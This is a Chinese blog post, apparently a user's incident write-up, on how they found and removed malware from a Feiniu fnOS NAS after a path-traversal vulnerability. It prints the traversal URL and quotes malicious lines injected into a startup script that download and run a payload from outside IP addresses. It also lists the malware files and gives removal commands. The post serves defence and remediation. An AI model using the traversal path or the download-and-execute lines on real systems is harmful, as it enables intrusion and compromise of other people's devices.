惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
C
CERT Recently Published Vulnerability Notes
C
Cybersecurity and Infrastructure Security Agency CISA
P
Proofpoint News Feed
Security Latest
Security Latest
P
Privacy International News Feed
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
AI
AI
Cisco Talos Blog
Cisco Talos Blog
K
Kaspersky official blog
S
Secure Thoughts
PCI Perspectives
PCI Perspectives
Simon Willison's Weblog
Simon Willison's Weblog
D
DataBreaches.Net
GbyAI
GbyAI
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
大猫的无限游戏
大猫的无限游戏
T
Tailwind CSS Blog
The Cloudflare Blog
阮一峰的网络日志
阮一峰的网络日志
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
罗磊的独立博客
V
Visual Studio Blog
aimingoo的专栏
aimingoo的专栏
H
Hackread – Cybersecurity News, Data Breaches, AI and More
IT之家
IT之家
V
V2EX
Last Week in AI
Last Week in AI
有赞技术团队
有赞技术团队
月光博客
月光博客
酷 壳 – CoolShell
酷 壳 – CoolShell
T
Tenable Blog
T
Threat Research - Cisco Blogs
T
Troy Hunt's Blog
V2EX - 技术
V2EX - 技术
S
Security @ Cisco Blogs
Security Archives - TechRepublic
Security Archives - TechRepublic
Project Zero
Project Zero
The GitHub Blog
The GitHub Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
L
Lohrmann on Cybersecurity
F
Full Disclosure
H
Help Net Security
博客园 - Franky
Stack Overflow Blog
Stack Overflow Blog
N
Netflix TechBlog - Medium
Engineering at Meta
Engineering at Meta
A
Arctic Wolf
O
OpenAI News
S
Securelist

ZhensJoke - 飞云算博客

基于飞牛NAS(FnOS)开发的FRP客户端可视化管理工具 用AI做了一个通过web管理frp客户端的工具 彻底解决 Win10 多屏锁屏登录后窗口混乱:PersistentWindows 使用Windows11的一些复古优化设置 京东云轻量应用服务器丢包严重。 宝塔面板FRP服务端插件下载地址 对新手极为友好的bootstrap开发工具 EA游戏平台无法安装的解决办法 近一年 一切安好
飞牛NAS(fnOS)严重安全漏洞(app-center-static)的分析及修复方式
ZhensJoke · 2026-01-31 · via ZhensJoke - 飞云算博客

记录一次飞牛NAS (fnos) 中毒排查与修复全过程

摘要:记录了从发现网络异常、定位漏洞到清除恶意代码的完整过程。涉及大量异常请求、系统漏洞利用及恶意脚本的手动清理。

1月22日:初现端倪

发现网络经常断线,检查路由发现飞牛NAS(fnos)的请求数达到惊人的 20W+

  • 临时措施:在路由器端限制了NAS的连接数。
  • 跟进:在论坛发帖询问。当天晚间客服联系要求远程排查,因NAS不在身边暂时搁置。

1月23日:尝试升级

客服联系建议升级至 v1.1.15 版本。升级后观察,网络异常消停了几天。

1月24日:漏洞预警

论坛出现相关讨论帖,指出系统可能存在高危漏洞。

参考帖子飞牛NAS系统可能存在漏洞

漏洞原理
通过特定URL路径可直接遍历文件系统:
地址/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../

1月25日:解除限制

观察情况稳定,解除了路由器的NAS连接数限制。

1月31日:病毒复发与深度查杀

情况复现,网络再次频繁断线。

  • 异常连接:发现同一IP 103.248.152.136 发起大量请求。
  • 尝试方案:参考 V2EX相关讨论 使用了一些专杀脚本,但治标不治本,重启后病毒依旧存在。

1. 溯源分析

检查系统文件,在 /usr/trim/bin/system_startup.sh 中发现了恶意代码注入:

# 查看启动脚本
cat /usr/trim/bin/system_startup.sh

文件内容分析
正常逻辑部分:

STATUS="/var/lib/dpkg/status"
BACKUP="/var/lib/dpkg/status.original"

if [ ! -f "$BACKUP" ]; then
    if [ -f "$STATUS" ]; then
        cp "$STATUS" "$BACKUP"
    fi
fi

if [ ! -f "$STATUS" ]; then
    if [ -f "$BACKUP" ]; then
        cp "$BACKUP" "$STATUS"
    fi
fi

注入的恶意代码部分

rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

# 恶意下载并执行
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
wget http://43.198.11.122/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp

# 因为地址无法访问了,获取不到具体恶意脚本内容

2. 清理与修复

首先执行社区提供的病毒专杀脚本:

Github Gist: 病毒专杀脚本

执行完脚本重启后,发现 /usr/lib/systemd/system/ 目录下仍有一些新创建的可疑文件。

待删除的恶意文件列表
总的建议是查看这些目录下的文件生成日期,22号之后都比较可疑。目前已知文件名如下

  • /sbin/gots
  • /usr/bin/dockers
  • /usr/trim/bin/wsdd2
  • /usr/bin/SazW
  • /usr/bin/nginx (注意区分系统自带nginx,确认是恶意文件再删)
  • /usr/lib/systemd/system/SazW.service
  • /usr/lib/systemd/system/nginx.service
  • /usr/lib/systemd/system/dockers.service
  • /usr/lib/systemd/system/trim_pap.service
  • /usr/lib/systemd/system/sync_server.service

彻底删除步骤
由于病毒通常会给文件加上 i 属性(不可修改),直接删除会失败。需要先解锁再删除。

# 1. 去除“不可修改”属性 (以 gots 为例,其他文件同理)
chattr -i /sbin/gots
# 建议批量解锁,例如: chattr -i /usr/bin/dockers /usr/trim/bin/wsdd2 ...

# 2. 强制删除
rm -f /sbin/gots

# 3. 检查是否删除成功
ls -l /sbin/gots

最后检查了系统的 Crontab 定时任务,暂未发现异常情况。

也可以试下这些命令,然后重启看看是否还有新的病毒文件生成。

# 1. 停止并禁用恶意服务 (防止进程占用导致无法删除)
# 注意:如果服务已经挂掉或不存在,报错可忽略
systemctl stop SazW nginx dockers trim_pap sync_server
systemctl disable SazW nginx dockers trim_pap sync_server

# 2. 批量解锁文件权限 (去除 immutable 属性)
chattr -i /sbin/gots \
          /usr/bin/dockers \
          /usr/trim/bin/wsdd2 \
          /usr/bin/SazW \
          /usr/bin/nginx \
          /usr/lib/systemd/system/SazW.service \
          /usr/lib/systemd/system/nginx.service \
          /usr/lib/systemd/system/dockers.service \
          /usr/lib/systemd/system/trim_pap.service \
          /usr/lib/systemd/system/sync_server.service

# 3. 强制删除恶意文件及服务配置
rm -rf /sbin/gots \
       /usr/bin/dockers \
       /usr/trim/bin/wsdd2 \
       /usr/bin/SazW \
       /usr/bin/nginx \
       /usr/lib/systemd/system/SazW.service \
       /usr/lib/systemd/system/nginx.service \
       /usr/lib/systemd/system/dockers.service \
       /usr/lib/systemd/system/trim_pap.service \
       /usr/lib/systemd/system/sync_server.service

# 4. 重载 systemd 守护进程 (让系统知道服务已被删除)
systemctl daemon-reload

# 5. 再次检查确认 (如果输出为空,则说明删除干净)
ls -l /sbin/gots /usr/bin/dockers /usr/trim/bin/wsdd2 /usr/bin/SazW

至此,可以重启看看是否还会有病毒文件生成。


最后说一句,关于这次事件飞牛官方人员的解释:

feiniu.jpg

1月31号大爆发了还这么说,也不提示用户进行更新,感觉不拿用户当回事。
图片出处
用户WDDXH提交的0day证据:

162152dx053okx1cztvv6l.jpg

可以看出使用官方的域名访问也是一样的情况

2月2日:官方发布查杀指南

参考链接:图片公告
文字教程:文字教程
官方修复脚本:

curl -L https://static2.fnnas.com/aptfix/trim-sec -o trim-sec && chmod +x trim-sec && ./trim-sec

具体漏洞细节可以查看epcdiy:【用户文件随便看!我们分析了知名NAS漏洞前世今生-哔哩哔哩】